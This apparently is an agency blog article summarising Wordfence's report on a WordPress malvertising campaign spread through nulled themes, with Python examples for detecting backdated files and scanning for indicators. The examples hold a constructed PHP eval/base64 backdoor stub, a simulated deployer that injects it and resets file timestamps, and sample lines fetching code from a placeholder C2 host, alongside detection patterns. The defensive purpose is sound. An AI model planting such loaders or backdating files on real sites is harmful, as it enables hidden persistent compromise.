An investigation by Wordfence, a WordPress security company, identified a persistent malvertising campaign targeting WordPress sites. First observed in February 2017, the campaign was tracked by Wordfence's analysts, who published a whitepaper in November 2019 to warn the WordPress community about the risk. According to Wordfence, the campaign infects sites and spreads through pirated ("nulled") themes and plugins that the attackers themselves distribute.
Unlike a typical malware injection, this campaign does not attack a WordPress site directly. It relies on site owners searching the internet for nulled content: commercial themes and plugins whose licensing and copyright checks have been stripped so they can be downloaded without paying the developer. The attackers modify the code of these pirated packages, turning them into carriers for their malware. Once an infected theme or plugin is installed, the infection can spread to other sites hosted in the same environment.
Even for experienced security professionals, the malicious code is not easy to spot. The attackers use plausible file structures and naming conventions, hiding the injected code in plain sight. A resilient command-and-control infrastructure also lets them keep a persistent presence on the site, so removing only part of the infection is not enough; the remaining pieces re-infect it.
Once you activate the infected theme, a deployer script scans the installation for every other installed theme and plants a backdoor in each one. The script also resets the modification timestamp of each altered file to its original value, so administrators cannot find the tampered files by sorting on modification date.
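A worked illustration of that timestamp trick and of two checks that survive it. This is an added example written for this article, not Wordfence's code or the campaign's deployer: the loader stub, theme names and file contents are constructed, and it assumes a POSIX filesystem, where a file's modification time (mtime) can be rewritten with touch()/utime but the inode change time (ctime) is stamped by the kernel on every change, including the utime call itself, and cannot be set back from user space.

```python
"""Integrity checks for WordPress theme files that survive mtime backdating.

Added example (not Wordfence's tooling). Assumes a POSIX filesystem: mtime can
be rewritten by the attacker, but ctime is set by the kernel on every inode
change, including the utime() call that resets mtime.
"""
from __future__ import annotations

import hashlib
import os
import tempfile
import time
from pathlib import Path


def sha256_file(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Baseline of every file under root: relative path -> sha256."""
    return {
        str(p.relative_to(root)): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_against_manifest(root: Path, manifest: dict[str, str]) -> list[str]:
    """Files that are new or whose content no longer matches the baseline."""
    return sorted(
        rel for rel, digest in build_manifest(root).items()
        if manifest.get(rel) != digest
    )


def files_modified_after(root: Path, since: float) -> list[str]:
    """The naive check: files with mtime newer than `since`. Backdating defeats it."""
    return sorted(
        str(p.relative_to(root))
        for p in root.rglob("*")
        if p.is_file() and p.stat().st_mtime > since
    )


def find_backdated_files(root: Path, min_skew_seconds: float = 3600) -> list[str]:
    """Files whose ctime is later than mtime by more than min_skew_seconds.

    A normal write moves mtime and ctime together. A file that was modified and
    then had its mtime reset keeps a fresh ctime, so the two drift apart.
    """
    hits = []
    for p in root.rglob("*"):
        if p.is_file():
            st = p.stat()
            if st.st_ctime - st.st_mtime > min_skew_seconds:
                hits.append(str(p.relative_to(root)))
    return sorted(hits)


# Constructed stand-in for an injected loader; not the campaign's real code.
LOADER_STUB = "@eval(base64_decode($_REQUEST['c'])); // constructed stand-in\n"


def simulate_deployer(themes_dir: Path) -> None:
    """Mimic the deployer described in the article: append a loader to every
    theme's functions.php, then restore the file's original mtime."""
    for functions_php in themes_dir.glob("*/functions.php"):
        st = functions_php.stat()
        with functions_php.open("a") as fh:
            fh.write(LOADER_STUB)
        os.utime(functions_php, ns=(st.st_atime_ns, st.st_mtime_ns))


def demo(gap_seconds: float = 1.1) -> dict[str, list[str]]:
    """Build two constructed themes, baseline them, infect them a little later,
    and report what each detection method sees."""
    with tempfile.TemporaryDirectory() as tmp:
        themes = Path(tmp) / "wp-content" / "themes"
        for name in ("premium-theme", "twentynineteen"):
            (themes / name).mkdir(parents=True)
            (themes / name / "style.css").write_text(f"/* Theme Name: {name} */\n")
            (themes / name / "functions.php").write_text(
                "<?php\nadd_theme_support('title-tag'); // constructed clean bootstrap\n"
            )
        baseline = build_manifest(themes)  # taken at install time, before infection
        install_time = time.time()
        time.sleep(gap_seconds)            # the infection happens later
        simulate_deployer(themes)
        return {
            "mtime_only": files_modified_after(themes, install_time),
            "hash_mismatch": diff_against_manifest(themes, baseline),
            "backdated": find_backdated_files(themes, min_skew_seconds=gap_seconds / 2),
        }


if __name__ == "__main__":
    for method, files in demo().items():
        print(f"{method:14s} -> {files}")
```

Run it and the mtime-based search reports nothing, while both the hash comparison and the ctime/mtime skew check name the two altered functions.php files. Two practical caveats: keep the baseline manifest somewhere the web server user cannot write, because an attacker with a backdoor can rewrite a manifest stored in the document root; and expect skew on freshly unpacked archives as well, since unzip restores the archive's old mtime while ctime is the extraction time, so use the skew check as a triage filter and confirm with hashes.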
Attackers monetize the campaign in two stages. First, they manipulate search results so that people looking for nulled themes and plugins land on sites hosting the infected files. Then, once a site is infected through a compromised theme, further malware injections push malicious adverts to the site's visitors, and the criminals collect ad revenue from every infected site.
Globally, about 455 million self-hosted websites run WordPress, roughly 20% of all self-hosted sites. Because the infection propagates laterally across a hosting environment, a single bad theme file can infect every site that shares that environment; in practice this happens where sites share a filesystem and the web server's user can write to the other sites' files, as on many shared hosting plans. And because the backdoor executes arbitrary code, the attackers can use it to deploy any other malware into the environment.
The attack's scalability makes it a serious threat to developers, administrators and site owners. The malware can change its command-and-control server addresses on the fly and re-infect files that have been cleaned, and the hardcoded backdoor lets the attackers add or remove code at will. Fortunately, the Wordfence analysts provide tools and procedures you can use to repair infected sites.
First, never install illegally obtained nulled content on a WordPress site. It is far safer to pay for a premium theme or to use a free one from a reputable developer, such as the themes in the official WordPress.org directory. You should also remove any plugins or themes that their original developers no longer maintain.
If you have used a nulled theme in the past, Wordfence published a list of indicators of compromise as an appendix to the whitepaper. It lists the domains, user names and download sites associated with the campaign. Checking your theme files, your WordPress user list and your site logs for these indicators will help your administrators determine whether your site is running infected theme files. If you need assistance with WordPress marketing or hosting, reach out to Tactical Web Media to discuss our comprehensive set of digital services today.
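The indicator check described above, as an added example (not Wordfence's scanner and not the appendix itself). The domain and username placeholders are constructed stand-ins to be replaced with the values from the whitepaper's appendix; the PHP-loader and access-log heuristics are generic ones a practitioner would add alongside them, not the campaign's signatures; and the sample functions.php, log lines and user list are constructed as well.

```python
"""Scan theme sources, access logs and the WordPress user list for indicators.

Added example, not Wordfence's tooling. Replace the placeholder indicators with
the domains, user names and download sites from the whitepaper appendix.
"""
from __future__ import annotations

import re
from typing import Iterable

# Constructed placeholders: NOT the real indicators of compromise.
IOC_DOMAINS = ["c2-placeholder.example", "nulled-downloads.example"]
IOC_USERNAMES = ["backdooradmin"]

# Generic heuristics for injected PHP loaders (not campaign-specific).
LOADER_PATTERNS = {
    "eval_of_decoded_string": re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "remote_include": re.compile(
        r"\b(file_get_contents|curl_init|include|require)\s*\(\s*['\"]https?://", re.I),
    "request_executed": re.compile(
        r"\b(eval|assert|system|passthru)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
}

# Direct HTTP requests to a .php file inside a theme or plugin directory are
# unusual in normal WordPress traffic and typical of backdoor callbacks.
DIRECT_THEME_PHP = re.compile(r'"(?:GET|POST) /wp-content/(?:themes|plugins)/[^" ]+\.php')


def scan_source(name: str, text: str, domains: Iterable[str] = IOC_DOMAINS) -> list[tuple[str, int, str]]:
    """Return (file, line_no, indicator) for each hit in a PHP source file."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for domain in domains:
            if domain in line:
                findings.append((name, line_no, f"ioc_domain:{domain}"))
        for label, pattern in LOADER_PATTERNS.items():
            if pattern.search(line):
                findings.append((name, line_no, label))
    return findings


def scan_access_log(lines: Iterable[str], domains: Iterable[str] = IOC_DOMAINS,
                    usernames: Iterable[str] = IOC_USERNAMES) -> list[tuple[int, str]]:
    """Return (line_no, indicator) for log lines that mention an indicator or
    request a theme/plugin PHP file directly."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        for domain in domains:
            if domain in line:
                findings.append((line_no, f"ioc_domain:{domain}"))
        for user in usernames:
            if user in line:
                findings.append((line_no, f"ioc_user:{user}"))
        if DIRECT_THEME_PHP.search(line):
            findings.append((line_no, "direct_theme_php_request"))
    return findings


def find_rogue_users(user_rows: Iterable[dict], usernames: Iterable[str] = IOC_USERNAMES) -> list[str]:
    """user_rows mirrors `wp user list --format=json` output (constructed below)."""
    wanted = {u.lower() for u in usernames}
    return sorted(row["user_login"] for row in user_rows if row["user_login"].lower() in wanted)


# Constructed sample inputs. The loader lines are stand-ins, not real campaign code.
SAMPLE_FUNCTIONS_PHP = """<?php
// constructed clean theme bootstrap
add_theme_support('post-thumbnails');
// constructed stand-in for an injected loader
$_u = 'http://c2-placeholder.example/code.php';
@eval(base64_decode($_REQUEST['x']));
$_c = @file_get_contents('http://c2-placeholder.example/loader');
"""

SAMPLE_LOG = [
    '203.0.113.5 - - [12/Nov/2019:10:00:01 +0000] "GET /wp-content/themes/premium-theme/style.css HTTP/1.1" 200 512 "https://shop.example/" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Nov/2019:10:02:17 +0000] "POST /wp-content/themes/premium-theme/functions.php HTTP/1.1" 200 17 "-" "curl/7.64.0"',
    '198.51.100.7 - - [12/Nov/2019:10:02:18 +0000] "GET /?p=1 HTTP/1.1" 200 900 "http://nulled-downloads.example/theme.zip" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Nov/2019:10:05:40 +0000] "GET /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 2100 "-" "Mozilla/5.0"',
]

SAMPLE_USERS = [
    {"ID": 1, "user_login": "admin", "roles": "administrator"},
    {"ID": 7, "user_login": "backdooradmin", "roles": "administrator"},
]

if __name__ == "__main__":
    for hit in scan_source("functions.php", SAMPLE_FUNCTIONS_PHP):
        print("source:", hit)
    for hit in scan_access_log(SAMPLE_LOG):
        print("log:", hit)
    print("rogue users:", find_rogue_users(SAMPLE_USERS))
```

Run the source scan over every file under wp-content/themes and wp-content/plugins rather than only the active theme, since the deployer touches every installed theme, and run the log scan over the full access-log history, not just recent days, because the backdoor was planted when the nulled theme was first installed.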